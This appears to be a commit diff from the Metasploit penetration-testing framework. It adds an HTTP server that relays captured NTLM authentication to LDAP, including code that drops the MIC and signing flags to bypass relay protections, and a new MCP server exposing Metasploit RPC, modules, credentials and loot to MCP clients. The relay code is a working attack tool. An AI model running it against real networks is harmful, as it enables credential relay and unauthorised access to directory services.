def create_relay_client(target, timeout)
case target.protocol
when :ldap
client = Msf::Exploit::Remote::Relay::NTLM::Target::LDAP::Client.create(self, target, logger, timeout)
else
raise RuntimeError, "unsupported protocol: #{target.protocol}"
end
client
rescue ::Rex::ConnectionTimeout => e
msg = "Timeout error retrieving server challenge from target #{target}. Most likely caused by unresponsive target"
elog(msg, error: e)
logger.print_error msg
nil
rescue ::Exception => e
msg = "Unable to create relay to #{target}"
elog(msg, error: e)
logger.print_error msg
nil
end
def finished?
state == :done || state == :aborted
end
def send_401_challenge
res = Rex::Proto::Http::Response.new
res.code = 401
res.message = "Unauthorized"
res.headers['WWW-Authenticate'] = "NTLM, Negotiate"
res.headers['Connection'] = "Keep-Alive"
res.headers['Content-Length'] = "0"
res.body = ""
cli.put(res.to_s)
end
def handle_type1(raw_ntlm_bytes, parsed_ntlm, auth_type)
@ntlm_context[:type1] = raw_ntlm_bytes
@current_target ||= @relay_targets.next(cli.peerhost)
if @current_target.nil?
logger.print_status("Target list exhausted for #{cli.peerhost}. Closing connection.")
res = Rex::Proto::Http::Response.new
res.code = 404
res.message = "Not Found"
res.headers['Connection'] = "Close"
res.headers['Content-Length'] = "0"
cli.send_response(res)
@state = :done
return
end
begin
logger.print_status("Attempting to relay to #{Rex::Socket.to_authority(@current_target.ip, @current_target.port)}")
@relayed_connection = create_relay_client(@current_target, @timeout)
if @relayed_connection.nil?
logger.print_error("Connection to #{@current_target.ip} failed: unable to create relay client")
advance_to_next_target_via_redirect
return
end
if @current_target.drop_mic_and_sign_key_exch_flags
incoming_security_buffer = do_drop_mic_and_flags(parsed_ntlm)
elsif @current_target.drop_mic_only
incoming_security_buffer = do_drop_mic(parsed_ntlm)
else
incoming_security_buffer = parsed_ntlm.serialize
end
relay_result = @relayed_connection.relay_ntlmssp_type1(incoming_security_buffer)
if relay_result && relay_result.nt_status == WindowsError::NTStatus::STATUS_MORE_PROCESSING_REQUIRED
type2_msg = relay_result.message
@ntlm_context[:type2] = type2_msg
if @ntlm_context[:wrapper] == :gss_spnego
wrapped_type2 = RubySMB::Gss.gss_type2(type2_msg.serialize)
target_type2_msg = Rex::Text.encode_base64(wrapped_type2)
auth_header = "#{auth_type} #{target_type2_msg}"
else
target_type2_msg = Rex::Text.encode_base64(type2_msg.serialize)
auth_header = "#{auth_type} #{target_type2_msg}"
end
logger.print_status("Received type2 from target #{@current_target.protocol}://#{Rex::Socket.to_authority(@current_target.ip, @current_target.port)}, attempting to relay back to client")
res = Rex::Proto::Http::Response.new
res.code = 401
res.message = "Unauthorized"
res.headers['WWW-Authenticate'] = auth_header
res.headers['Connection'] = "Keep-Alive"
res.headers['Content-Length'] = "0"
cli.send_response(res)
@state = :awaiting_type3
return
else
logger.print_error("Target #{@current_target.ip} rejected the Type 1 message.")
end
rescue ::Exception => e
logger.print_error("Connection to #{@current_target.ip} failed: #{e.message}")
end
advance_to_next_target_via_redirect
end
def complete_current_relay_attempt(is_success:, identity: nil)
return unless @current_target
@relay_targets.on_relay_end(@current_target, identity: identity, is_success: is_success)
end
def handle_type3(parsed_type3)
relay_succeeded = false
relay_completed = false
# 1. Safely extract the identity from the Type 3 message early
identity = nil
if parsed_type3
domain = parsed_type3.domain.to_s.force_encoding('UTF-8')
user = parsed_type3.user.to_s.force_encoding('UTF-8')
identity = "#{domain}\\#{user}" unless user.empty?
end
if @current_target.drop_mic_and_sign_key_exch_flags
incoming_security_buffer = do_drop_mic_and_flags(parsed_type3)
elsif @current_target.drop_mic_only
incoming_security_buffer = do_drop_mic(parsed_type3)
else
incoming_security_buffer = parsed_type3.serialize
end
relay_result = @relayed_connection.relay_ntlmssp_type3(incoming_security_buffer)
if relay_result && relay_result.nt_status == WindowsError::NTStatus::STATUS_SUCCESS
relay_succeeded = true
logger.on_ntlm_type3(
address: @relayed_connection.target.ip,
ntlm_type1: @ntlm_context[:type1],
ntlm_type2: @ntlm_context[:type2],
ntlm_type3: parsed_type3,
service_name: 'HTTP'
)
if identity.blank?
logger.print_status("Anonymous Identity - Successfully authenticated against relay target #{@relayed_connection.target.ip}")
@relayed_connection.disconnect! if @relayed_connection
else
logger.print_good("Identity: #{identity} - Successfully relayed NTLM authentication to LDAP!")
logger.on_relay_success(relay_connection: @relayed_connection, relay_identity: identity)
end
@relayed_connection = nil
else
logger.print_error("Relayed authentication failed or was rejected by LDAP.")
@relayed_connection.disconnect! if @relayed_connection
@relayed_connection = nil
end
complete_current_relay_attempt(is_success: relay_succeeded, identity: identity)
relay_completed = true
@state = :done
advance_to_next_target_via_redirect
rescue StandardError => e
logger.print_error("Relaying type 3 message to target #{@current_target.ip} failed: #{e.message}")
complete_current_relay_attempt(is_success: false, identity: identity) unless relay_completed
end
def advance_to_next_target_via_redirect
@current_target = @relay_targets.next(@cli.peerhost)
if @current_target
random_path = "/" + Rex::Text.rand_text_alphanumeric(10)
@redirect_uri = random_path
@logger.print_status("Moving to next target (#{@current_target.ip}). Issuing 307 Redirect to #{random_path}")
res = Rex::Proto::Http::Response.new
res.code = 307
res.message = "Temporary Redirect"
res.headers['Location'] = random_path
res.headers['Connection'] = "keep-alive"
res.headers['Content-Length'] = "0"
cli.send_response(res)
@state = :unauthenticated
@ntlm_context[:type1] = nil
@ntlm_context[:type2] = nil
else
@logger.print_status("Target list exhausted for #{cli.peerhost}. Closing connection.")
res = Rex::Proto::Http::Response.new
res.code = 404
res.message = "Not Found"
res.headers['Connection'] = "close"
res.headers['Content-Length'] = "0"
cli.send_response(res)
@state = :done
end
end
def abort_connection(reason)
logger.print_error("Aborting connection with #{cli.peerhost}: #{reason}")
res = Rex::Proto::Http::Response.new
res.code = 400
res.message = "Bad Request"
res.headers['Connection'] = "Close"
res.headers['Content-Length'] = "0"
res.body = ""
cli.put(res.to_s)
@state = :aborted
end
def unwrap_ntlm_base64(b64_msg)
buf = Rex::Text.decode_base64(b64_msg)
if valid_ntlm_blob?(buf)
@ntlm_context[:wrapper] = :none
return buf
end
gss_api = OpenSSL::ASN1.decode(buf)
if gss_api&.tag == 0 && gss_api&.tag_class == :APPLICATION
logger.print_status("Detected GSS-SPNEGO wrapping around the type1 NTLM message")
@ntlm_context[:wrapper] = :gss_spnego
return process_gss_spnego_init(buf)
elsif gss_api&.tag == 1 && gss_api&.tag_class == :CONTEXT_SPECIFIC
logger.print_status("Detected GSS-SPNEGO wrapping around the type3 NTLM message")
@ntlm_context[:wrapper] = :gss_spnego
return process_gss_spnego_targ(buf)
end
raise ArgumentError, "Unrecognized NTLM or SPNEGO payload"
end
def extract_ntlm_message(auth_header)
return nil unless auth_header
# Match either "NTLM <base64>" or "Negotiate <base64>" (case insensitive)
if auth_header =~ /^(NTLM|Negotiate)\s+(.+)$/i
return $1, $2 # Return The auth type and the base64 message
end
nil
end
private
def valid_ntlm_blob?(blob)
blob&.start_with?("NTLMSSP\x00")
end
def validate_ntlm_blob!(blob)
raise ArgumentError, 'The NTLM blob found was malformed' unless valid_ntlm_blob?(blob)
end
def process_gss_spnego_init(incoming_security_buffer)
begin
gss_init = Rex::Proto::Gss::SpnegoNegTokenInit.parse(incoming_security_buffer)
ntlm_blob = gss_init.mech_token
validate_ntlm_blob!(ntlm_blob)
ntlm_blob
rescue RASN1::ASN1Error => e
raise ArgumentError, "Failed to parse NTLMSSP Type1 from GSS: #{e.message}"
end
end
def process_gss_spnego_targ(incoming_security_buffer)
begin
gss_targ = Rex::Proto::Gss::SpnegoNegTokenTarg.parse(incoming_security_buffer)
ntlm_blob = gss_targ.response_token
validate_ntlm_blob!(ntlm_blob)
ntlm_blob
rescue RASN1::ASN1Error, ArgumentError => e
raise ArgumentError, "Failed to parse NTLMSSP Type3 from GSS: #{e.message}"
end
end
def do_drop_mic(ntlm_message)
logger.print_status('Dropping MIC')
ntlm_message.serialize
end
def do_drop_mic_and_flags(ntlm_message)
logger.print_status('Dropping MIC and removing flags: `Always Sign`, `Sign` and `Key Exchange`')
flags = ntlm_message.flag
flags &= ~Net::NTLM::FLAGS[:ALWAYS_SIGN] & ~Net::NTLM::FLAGS[:SIGN] & ~Net::NTLM::FLAGS[:KEY_EXCHANGE]
ntlm_message.flag = flags
ntlm_message.serialize
end
end
end
+1 -1
View File
@@ -60,7 +60,7 @@ module Exploit::Remote::MsSamr
rescue RubySMB::Dcerpc::Error::DcerpcError => e
elog(e.message, error: e)
raise MsSamrUnexpectedReplyError, e.message
rescue RubySMB::Error::RubySMBError
rescue RubySMB::Error::RubySMBError => e
elog(e.message, error: e)
raise MsSamrUnknownError, e.message
end
@@ -55,11 +55,21 @@ module Msf::Exploit::Remote::Relay::NTLM::Target::LDAP
)
end
# Determines whether the relay connection originated from an HTTP server.
#
# @return [Boolean] true if the provider's class name contains 'httpserver', false otherwise.
def is_http_source?
@provider && @provider.class.name.to_s.downcase.include?('httpserver')
end
# @param [String] client_type3_msg
# @rtype [Msf::Exploit::Remote::Relay::NTLM::Target::RelayResult, nil]
def relay_ntlmssp_type3(client_type3_msg)
ntlm_message = Net::NTLM::Message.parse(client_type3_msg)
if ntlm_message.ntlm_version == :ntlmv2
# Suppress the warning for HTTP sources because they can safely relay NTLMv2 type 3 messages. During testing
# non-Windows HTTP clients that sent NTLMv2 type 3 messages were able to be relayed to LDAP without issue.
if ntlm_message.ntlm_version == :ntlmv2 && !is_http_source?
logger.print_warning('Relay client\'s NTLM type 3 message is NTLMv2, relaying to LDAP will not work')
end
+1 -2
View File
@@ -1,6 +1,5 @@
# -*- coding: binary -*-
require 'rex/encoder/ndr'
require 'recog'
module Msf
module Exploit::Remote::SMB
@@ -413,7 +412,7 @@ module Msf
# Leverage Recog for SMB native OS fingerprinting
fp_match = Recog::Nizer.match('smb.native_os', fprint['native_os']) || { }
os = fp_match['os.product'] || 'Unknown'
os = fp_match['os.product'] || fp_match['os.family'] || 'Unknown'
sp = fp_match['os.version'] || ''
# Metasploit prefers 'Windows 2003' vs 'Windows Server 2003'
-1
View File
@@ -11,7 +11,6 @@ require 'monitor'
#
require 'metasploit/framework/version'
require 'rex/socket/ssl'
require 'metasploit/framework/thread_factory_provider'
module Msf
+75
View File
@@ -0,0 +1,75 @@
# frozen_string_literal: true
# Main entry point for MSF MCP Server
module Msf
module MCP
VERSION = '0.1.0'
end
end
# Load the base configuration (for default paths, etc.)
require 'msf/base/config'
# Load the base Rex libraries
require 'rex/socket'
require 'rex/logging'
require 'rex/logging/log_sink'
module Msf
module MCP
# Log source identifier for all MCP log messages.
LOG_SOURCE = 'mcp'
# Log level aliases — semantic names for Rex::Logging level constants.
LOG_DEBUG = Rex::Logging::LEV_3
LOG_INFO = Rex::Logging::LEV_2
LOG_WARN = Rex::Logging::LEV_1
LOG_ERROR = Rex::Logging::LEV_0
end
end
# Load the MCP-specific logging components
require_relative 'mcp/logging/sinks/json_stream'
require_relative 'mcp/logging/sinks/json_flatfile'
require_relative 'mcp/logging/sinks/sanitizing'
require_relative 'mcp/middleware/request_logger'
# Error classes
require_relative 'mcp/errors'
# Configuration Layer
require_relative 'mcp/config/loader'
require_relative 'mcp/config/validator'
# Security Layer
require_relative 'mcp/security/input_validator'
require_relative 'mcp/security/rate_limiter'
# Metasploit Client Layer
require_relative 'mcp/rpc_manager'
require_relative 'mcp/metasploit/messagepack_client'
require_relative 'mcp/metasploit/jsonrpc_client'
require_relative 'mcp/metasploit/client'
require_relative 'mcp/metasploit/response_transformer'
# MCP SDK
require 'mcp'
# MCP Layer
require_relative 'mcp/tools/tool_helper'
require_relative 'mcp/tools/search_modules'
require_relative 'mcp/tools/module_info'
require_relative 'mcp/tools/host_info'
require_relative 'mcp/tools/service_info'
require_relative 'mcp/tools/vulnerability_info'
require_relative 'mcp/tools/note_info'
require_relative 'mcp/tools/credential_info'
require_relative 'mcp/tools/loot_info'
require_relative 'mcp/server'
# Application Layer
require_relative 'mcp/application'
# Make logging stubs (ilog, elog, dlog, wlog)
include Rex::Logging
+334
View File
@@ -0,0 +1,334 @@
# frozen_string_literal: true
require 'msf/core/mcp'
require 'optparse'
module Msf::MCP
# Main application class that orchestrates the MCP server startup and lifecycle
class Application
VERSION = '0.1.0'
BANNER = <<~BANNER
MSF MCP Server v#{VERSION}
Model Context Protocol server for Metasploit Framework
BANNER
# For testing purposes:
attr_reader :config, :msf_client, :mcp_server, :rate_limiter, :options, :rpc_manager
# Initialize the application with command-line arguments
#
# @param argv [Array<String>] Command-line arguments
# @param output [IO] Output stream for messages (default: $stderr)
def initialize(argv = ARGV, output: $stderr)
@argv = argv.dup
@output = output
@options = {}
@config = nil
@msf_client = nil
@mcp_server = nil
@rate_limiter = nil
@rpc_manager = nil
end
# Run the application
#
# @return [void]
def run
parse_arguments
install_signal_handlers
load_configuration
validate_configuration
initialize_logger
initialize_rate_limiter
ensure_rpc_server
initialize_metasploit_client
authenticate_metasploit
initialize_mcp_server
start_mcp_server
rescue Msf::MCP::Config::ValidationError, Msf::MCP::Config::ConfigurationError => e
handle_configuration_error(e)
rescue Msf::MCP::Metasploit::ConnectionError => e
handle_connection_error(e)
rescue Msf::MCP::Metasploit::APIError => e
handle_api_error(e)
rescue Msf::MCP::Metasploit::AuthenticationError => e
handle_authentication_error(e)
rescue Msf::MCP::Metasploit::RpcStartupError => e
handle_rpc_startup_error(e)
rescue StandardError => e
handle_fatal_error(e)
end
# Shutdown the application gracefully
#
# Performs cleanup operations before process termination:
# - Logs shutdown event via Rex
# - Closes MCP server and Metasploit client connections
# - Cleans up resources
#
# @param signal [String] Signal name (e.g., 'INT', 'TERM')
# @return [void]
def shutdown(signal = 'INT')
ilog({
message: 'Shutting down',
context: { signal: "SIG#{signal}" }
}, LOG_SOURCE, LOG_INFO)
@mcp_server&.shutdown
@rpc_manager&.stop_rpc_server
@output.puts "\nShutdown complete"
end
private
# Parse command-line arguments
#
# @return [void]
def parse_arguments
parser = OptionParser.new do |opts|
opts.banner = BANNER + "\nUsage: msfmcp [options]"
opts.on('--config PATH', 'Path to configuration file') do |path|
@options[:config_path] = File.expand_path(path)
end
opts.on('--enable-logging', 'Enable file logging') do
@options[:enable_logging_cli] = true
end
opts.on('--log-file PATH', 'Log file path (overrides config file)') do |path|
@options[:log_file_cli] = path
end
opts.on('--user USER', 'MSF API username (for MessagePack auth)') do |user|
@options[:msf_user_cli] = user
end
opts.on('--password PASS', 'MSF API password (for MessagePack auth)') do |password|
@options[:msf_password_cli] = password
end
opts.on('--no-auto-start-rpc', 'Disable automatic RPC server startup') do
@options[:no_auto_start_rpc] = true
end
opts.on('--mcp-transport TRANSPORT', 'MCP server transport type (\'stdio\' or \'http\')') do |transport|
@options[:mcp_transport] = transport
end
opts.on('-h', '--help', 'Show this help message') do
@output.puts opts
exit 0
end
opts.on('-v', '--version', 'Show version information') do
@output.puts "msfmcp version #{VERSION}"
exit 0
end
end
parser.parse!(@argv)
end
# Register a Rex log source when logging is enabled.
#
# Selects a JsonFlatfile sink pointed at the configured log path and wraps it
# with the sanitizing middleware unless sanitization has been explicitly
# disabled in the config.
#
# Priority: CLI flags > config file > defaults
#
# @return [void]
def initialize_logger
return unless @options[:enable_logging_cli] || @config.dig(:logging, :enabled)
log_file = @options[:log_file_cli] || @config.dig(:logging, :log_file)
level = @config.dig(:logging, :level)
threshold = case @config.dig(:logging, :level).upcase
when 'DEBUG'
Rex::Logging::LEV_3
when 'INFO'
Rex::Logging::LEV_2
when 'WARN'
Rex::Logging::LEV_1
when 'ERROR'
Rex::Logging::LEV_0
end
inner = Msf::MCP::Logging::Sinks::JsonFlatfile.new(log_file)
sink = @config.dig(:logging, :sanitize) ? Msf::MCP::Logging::Sinks::Sanitizing.new(inner) : inner
deregister_log_source(LOG_SOURCE) if log_source_registered?(LOG_SOURCE)
register_log_source(LOG_SOURCE, sink, threshold)
end
# Install signal handlers for graceful shutdown
#
# @return [void]
def install_signal_handlers
Signal.trap('INT') { shutdown('INT'); exit 0 }
Signal.trap('TERM') { shutdown('TERM'); exit 0 }
end
# Load configuration from file or use defaults
#
# @return [void]
def load_configuration
if @options[:config_path]
@output.puts "Loading configuration from #{@options[:config_path]}"
@config = Msf::MCP::Config::Loader.load(@options[:config_path])
else
@output.puts "No configuration file specified, using defaults"
@config = Msf::MCP::Config::Loader.load_from_hash({})
end
# Apply CLI authentication overrides (highest priority)
if @options[:msf_user_cli]
@config[:msf_api][:user] = @options[:msf_user_cli]
end
if @options[:msf_password_cli]
@config[:msf_api][:password] = @options[:msf_password_cli]
end
if @options[:no_auto_start_rpc]
@config[:msf_api][:auto_start_rpc] = false
end
if @options[:mcp_transport]
@config[:mcp][:transport] = @options[:mcp_transport]
end
end
# Validate the loaded configuration
#
# @return [void]
def validate_configuration
@output.puts "Validating configuration..."
Msf::MCP::Config::Validator.validate!(@config)
@output.puts "Configuration valid"
end
# Initialize the rate limiter
#
# @return [void]
def initialize_rate_limiter
@rate_limiter = Msf::MCP::Security::RateLimiter.new(
requests_per_minute: @config.dig(:rate_limit, :requests_per_minute) || 60,
burst_size: @config.dig(:rate_limit, :burst_size)
)
end
# Ensure the Metasploit RPC server is available, auto-starting if needed
#
# @return [void]
def ensure_rpc_server
@rpc_manager = Msf::MCP::RpcManager.new(
config: @config,
output: @output
)
@rpc_manager.ensure_rpc_available
end
# Initialize the Metasploit client
#
# @return [void]
def initialize_metasploit_client
@output.puts "Connecting to Metasploit RPC at #{@config[:msf_api][:host]}:#{@config[:msf_api][:port]}"
@msf_client = Msf::MCP::Metasploit::Client.new(
api_type: @config[:msf_api][:type],
host: @config[:msf_api][:host],
port: @config[:msf_api][:port],
endpoint: @config[:msf_api][:endpoint],
token: @config[:msf_api][:token],
ssl: @config[:msf_api][:ssl]
)
end
# Authenticate with Metasploit if using MessagePack
#
# @return [void]
def authenticate_metasploit
if @config[:msf_api][:type] == 'messagepack'
@output.puts "Authenticating with Metasploit..."
@msf_client.authenticate(@config[:msf_api][:user].to_s, @config[:msf_api][:password].to_s)
@output.puts "Authentication successful"
else
@output.puts "Using JSON-RPC with token authentication"
end
end
# Initialize the MCP server
#
# @return [void]
def initialize_mcp_server
@output.puts "Initializing MCP server..."
@mcp_server = Msf::MCP::Server.new(
msf_client: @msf_client,
rate_limiter: @rate_limiter
)
end
# Start the MCP server with configured transport
#
# @return [void]
def start_mcp_server
transport = (@config.dig(:mcp, :transport) || 'stdio').to_sym
host = @config.dig(:mcp, :host) || 'localhost'
port = @config.dig(:mcp, :port) || 3000
if transport == :http
@output.puts "Starting MCP server on HTTP transport..."
@output.puts "Server listening on http://#{host}:#{port}"
@output.puts "Press Ctrl+C to shutdown"
@mcp_server.start(transport: :http, host: host, port: port)
else
@output.puts "Starting MCP server on stdio transport..."
@output.puts "Server ready - waiting for MCP requests"
@output.puts "Press Ctrl+C to shutdown"
@mcp_server.start(transport: :stdio)
end
end
# Error handlers
def handle_configuration_error(error)
@output.puts "Configuration validation failed: #{error.message}"
exit 1
end
def handle_connection_error(error)
elog({
message: 'Connection error',
context: { host: @config[:msf_api][:host], port: @config[:msf_api][:port] },
exception: error
}, LOG_SOURCE, LOG_ERROR)
@output.puts "Connection error to Metasploit RPC at #{@config[:msf_api][:host]}:#{@config[:msf_api][:port]} - #{error.message}"
exit 1
end
def handle_api_error(error)
elog({ message: 'Metasploit API error', exception: error }, LOG_SOURCE, LOG_ERROR)
@output.puts "Metasploit API error: #{error.message}"
exit 1
end
def handle_authentication_error(error)
elog({
message: 'Authentication error',
context: { username: @config[:msf_api][:user].to_s },
exception: error
}, LOG_SOURCE, LOG_ERROR)
@output.puts "Authentication error (username: #{@config[:msf_api][:user]}): #{error.message}"
exit 1
end
def handle_rpc_startup_error(error)
elog({ message: 'RPC startup error', exception: error }, LOG_SOURCE, LOG_ERROR)
@output.puts "RPC startup error: #{error.message}"
exit 1
end
def handle_fatal_error(error)
elog({ message: 'Fatal error during startup', exception: error }, LOG_SOURCE, LOG_ERROR)
@output.puts "Fatal error: #{error.message}"
@output.puts error.backtrace.first(5).join("\n") if error.backtrace
exit 1
end
end
end
+123
View File
@@ -0,0 +1,123 @@
# frozen_string_literal: true
require 'yaml'
module Msf::MCP
module Config
class Loader
# Load configuration from YAML file with environment variable overrides
#
# @param file_path [String] Path to YAML configuration file
# @return [Hash] Configuration hash with symbolized keys
# @raise [ConfigurationError] If file not found or invalid YAML
def self.load(file_path)
unless File.exist?(file_path)
raise ConfigurationError, "Configuration file not found: #{file_path}"
end
begin
config = YAML.safe_load_file(file_path, symbolize_names: true)
rescue Psych::SyntaxError => e
raise ConfigurationError, "Invalid YAML syntax in #{file_path}: #{e.message}"
end
unless config.is_a?(Hash)
raise ConfigurationError, "Configuration file must contain a YAML hash/dictionary"
end
apply_defaults(config)
apply_env_overrides(config)
config
end
# Load configuration from hash (for testing)
#
# @param config_hash [Hash] Configuration hash
# @return [Hash] Configuration hash with defaults and env overrides
def self.load_from_hash(config_hash)
config = config_hash.dup
apply_defaults(config)
apply_env_overrides(config)
config
end
private
# Apply default values to configuration
#
# @param config [Hash] Configuration hash to modify in place
def self.apply_defaults(config)
config[:msf_api] ||= {}
config[:mcp] ||= {}
config[:rate_limit] ||= {}
config[:logging] ||= {}
config[:msf_api][:type] ||= 'messagepack'
config[:msf_api][:host] ||= 'localhost'
config[:msf_api][:port] ||= (config[:msf_api][:type] == 'json-rpc') ? 8081 : 55553
config[:msf_api][:ssl] = config[:msf_api].fetch(:ssl, true)
config[:msf_api][:auto_start_rpc] = config[:msf_api].fetch(:auto_start_rpc, true)
config[:msf_api][:endpoint] ||= case config[:msf_api][:type]
when 'json-rpc'
Msf::MCP::Metasploit::JsonRpcClient::DEFAULT_ENDPOINT
else
Msf::MCP::Metasploit::MessagePackClient::DEFAULT_ENDPOINT
end
config[:mcp][:transport] ||= 'stdio'
if config[:mcp][:transport] == 'http'
config[:mcp][:host] ||= 'localhost'
config[:mcp][:port] ||= 3000
end
config[:rate_limit][:enabled] = config[:rate_limit].fetch(:enabled, true)
config[:rate_limit][:requests_per_minute] ||= 60
config[:rate_limit][:burst_size] ||= 10
config[:logging][:enabled] = config[:logging].fetch(:enabled, false)
config[:logging][:level] ||= 'INFO'
config[:logging][:log_file] ||= File.join(Msf::Config.log_directory, 'msfmcp.log')
config[:logging][:sanitize] = config[:logging].fetch(:sanitize, true)
end
# Apply environment variable overrides
#
# @param config [Hash] Configuration hash to modify in place
def self.apply_env_overrides(config)
# Ensure nested hashes exist
config[:msf_api] ||= {}
config[:mcp] ||= {}
# MSF API overrides
config[:msf_api][:type] = ENV['MSF_API_TYPE'] if ENV['MSF_API_TYPE']
config[:msf_api][:host] = ENV['MSF_API_HOST'] if ENV['MSF_API_HOST']
config[:msf_api][:port] = ENV['MSF_API_PORT'].to_i if ENV['MSF_API_PORT']
config[:msf_api][:ssl] = parse_boolean(ENV['MSF_API_SSL']) if ENV['MSF_API_SSL'] && !ENV['MSF_API_SSL'].empty?
config[:msf_api][:endpoint] = ENV['MSF_API_ENDPOINT'] if ENV['MSF_API_ENDPOINT']
config[:msf_api][:user] = ENV['MSF_API_USER'] if ENV['MSF_API_USER']
config[:msf_api][:password] = ENV['MSF_API_PASSWORD'] if ENV['MSF_API_PASSWORD']
config[:msf_api][:token] = ENV['MSF_API_TOKEN'] if ENV['MSF_API_TOKEN']
config[:msf_api][:auto_start_rpc] = parse_boolean(ENV['MSF_AUTO_START_RPC']) if ENV['MSF_AUTO_START_RPC']
# MCP transport override
config[:mcp][:transport] = ENV['MSF_MCP_TRANSPORT'] if ENV['MSF_MCP_TRANSPORT']
# MCP server network overrides
config[:mcp][:host] = ENV['MSF_MCP_HOST'] if ENV['MSF_MCP_HOST']
config[:mcp][:port] = ENV['MSF_MCP_PORT'].to_i if ENV['MSF_MCP_PORT']
end
# Parse a string value into a boolean
#
# @param value [String] String to parse ('true', '1', 'yes' → true; anything else → false)
# @return [Boolean]
def self.parse_boolean(value)
%w[true 1 yes].include?(value.to_s.downcase)
end
end
end
end
+202
View File
@@ -0,0 +1,202 @@
# frozen_string_literal: true
module Msf::MCP
module Config
class Validator
VALID_API_TYPES = %w[messagepack json-rpc].freeze
VALID_TRANSPORTS = %w[stdio http].freeze
# Validate configuration hash (class method)
#
# @param config [Hash] Configuration hash to validate
# @return [true] If validation passes
# @raise [ValidationError] If validation fails
def self.validate!(config)
new.validate!(config)
end
# Validate configuration hash (instance method)
#
# @param config [Hash] Configuration hash to validate
# @return [true] If validation passes
# @raise [ValidationError] If validation fails
def validate!(config)
errors = {}
# Check msf_api section exists
unless config[:msf_api].is_a?(Hash)
errors[:msf_api] = "configuration section is required"
raise ValidationError.new(errors)
end
# Validate API type
if config[:msf_api][:type] && !VALID_API_TYPES.include?(config[:msf_api][:type])
errors[:'msf_api.type'] = "must be one of the valid API types: #{VALID_API_TYPES.join(', ')}"
end
# Validate API type
if config[:msf_api][:host] && config[:msf_api][:host].to_s.strip.empty?
errors[:'msf_api.host'] = "must be a non-empty string"
end
# Validate mcp section type
if config.key?(:mcp) && !config[:mcp].is_a?(Hash)
errors[:mcp] = "must be a configuration hash"
end
# Validate transport
if config[:mcp].is_a?(Hash) && config[:mcp][:transport] && !VALID_TRANSPORTS.include?(config[:mcp][:transport])
errors[:'mcp.transport'] = "must be one of the valid transport: #{VALID_TRANSPORTS.join(', ')}"
end
# Validate port
if config[:msf_api][:port]
port = config[:msf_api][:port].to_i
unless port.between?(1, 65535)
errors[:'msf_api.port'] = "must be between 1 and 65535"
end
end
# Validate SSL option
if config[:msf_api].key?(:ssl) && ![true, false].include?(config[:msf_api][:ssl])
errors[:'msf_api.ssl'] = "must be boolean (true or false)"
end
# Validate auto_start_rpc option
if config[:msf_api].key?(:auto_start_rpc) && ![true, false].include?(config[:msf_api][:auto_start_rpc])
errors[:'msf_api.auto_start_rpc'] = "must be boolean (true or false)"
end
# Validate MCP port
if config[:mcp].is_a?(Hash) && config[:mcp][:port]
port = config[:mcp][:port].to_i
unless port.between?(1, 65535)
errors[:'mcp.port'] = "must be between 1 and 65535"
end
end
# Validate conditional requirements based on API type
if config[:msf_api][:type] == 'messagepack'
validate_messagepack_auth(config, errors)
elsif config[:msf_api][:type] == 'json-rpc'
validate_jsonrpc_auth(config, errors)
end
# Validate rate_limit section
if config.key?(:rate_limit)
if config[:rate_limit].is_a?(Hash)
validate_rate_limit(config, errors)
else
errors[:rate_limit] = "must be a configuration hash"
end
end
# Validate logging section
if config.key?(:logging)
if config[:logging].is_a?(Hash)
validate_logging(config, errors)
else
errors[:logging] = "must be a configuration hash"
end
end
# Raise error if any validation failed
unless errors.empty?
raise ValidationError.new(errors)
end
true
end
private
LOCALHOST_HOSTS = %w[localhost 127.0.0.1 ::1].freeze
# Validate MessagePack authentication fields
#
# Credentials are optional when auto-start can generate random ones
# (auto_start_rpc enabled + localhost). If neither user nor password is
# provided under those conditions, validation passes and the RPC manager
# will generate random credentials at startup.
def validate_messagepack_auth(config, errors)
user_provided = config[:msf_api][:user] && !config[:msf_api][:user].to_s.strip.empty?
password_provided = config[:msf_api][:password] && !config[:msf_api][:password].to_s.strip.empty?
# Both provided — nothing to validate
return if user_provided && password_provided
# Neither provided and auto-start can generate them — OK
return if !user_provided && !password_provided && credentials_can_be_generated?(config)
# Otherwise, require both
unless user_provided
errors[:'msf_api.user'] = "is required for MessagePack authentication. Use --user option or MSF_API_USER environment variable"
end
unless password_provided
errors[:'msf_api.password'] = "is required for MessagePack authentication. Use --password option or MSF_API_PASSWORD environment variable"
end
end
# Whether the RPC manager can generate random credentials for this config.
#
# @param config [Hash] Configuration hash
# @return [Boolean]
def credentials_can_be_generated?(config)
config[:msf_api][:auto_start_rpc] != false &&
LOCALHOST_HOSTS.include?(config[:msf_api][:host].to_s.downcase)
end
# Validate JSON-RPC authentication fields
def validate_jsonrpc_auth(config, errors)
unless config[:msf_api][:token] && !config[:msf_api][:token].to_s.strip.empty?
errors[:'msf_api.token'] = "is required for JSON-RPC authentication"
end
end
# Validate rate_limit section fields
def validate_rate_limit(config, errors)
rate_limit = config[:rate_limit]
if rate_limit.key?(:enabled) && ![true, false].include?(rate_limit[:enabled])
errors[:'rate_limit.enabled'] = "must be boolean (true or false)"
end
if rate_limit.key?(:requests_per_minute)
unless rate_limit[:requests_per_minute].is_a?(Integer) && rate_limit[:requests_per_minute] >= 1
errors[:'rate_limit.requests_per_minute'] = "must be an integer >= 1"
end
end
if rate_limit.key?(:burst_size)
unless rate_limit[:burst_size].is_a?(Integer) && rate_limit[:burst_size] >= 1
errors[:'rate_limit.burst_size'] = "must be an integer >= 1"
end
end
end
VALID_LOG_LEVELS = %w[DEBUG INFO WARN ERROR].freeze
# Validate logging section fields
def validate_logging(config, errors)
logging = config[:logging]
if logging.key?(:enabled) && ![true, false].include?(logging[:enabled])
errors[:'logging.enabled'] = "must be boolean (true or false)"
end
if logging.key?(:level) && !VALID_LOG_LEVELS.include?(logging[:level].to_s.upcase)
errors[:'logging.level'] = "must be one of: #{VALID_LOG_LEVELS.join(', ')}"
end
if logging.key?(:log_file) && logging[:log_file].to_s.strip.empty?
errors[:'logging.log_file'] = "must be a non-empty string"
end
if logging.key?(:sanitize) && ![true, false].include?(logging[:sanitize])
errors[:'logging.sanitize'] = "must be boolean (true or false)"
end
end
end
end
end
+69
View File
@@ -0,0 +1,69 @@
# frozen_string_literal: true
module Msf::MCP
##
# Base error class for all Msf::MCP errors
#
class Error < StandardError; end
##
# Configuration Layer Errors
#
module Config
class ConfigurationError < Error; end
class ValidationError < Error
attr_reader :errors
def initialize(errors = {})
@errors = errors
super(build_message)
end
private
def build_message
return "Configuration validation failed" if @errors.empty?
messages = @errors.map { |field, error| "#{field} #{error}" }
"Configuration validation failed:\n - #{messages.join("\n - ")}"
end
end
end
##
# Security Layer Errors
#
module Security
class ValidationError < Error; end
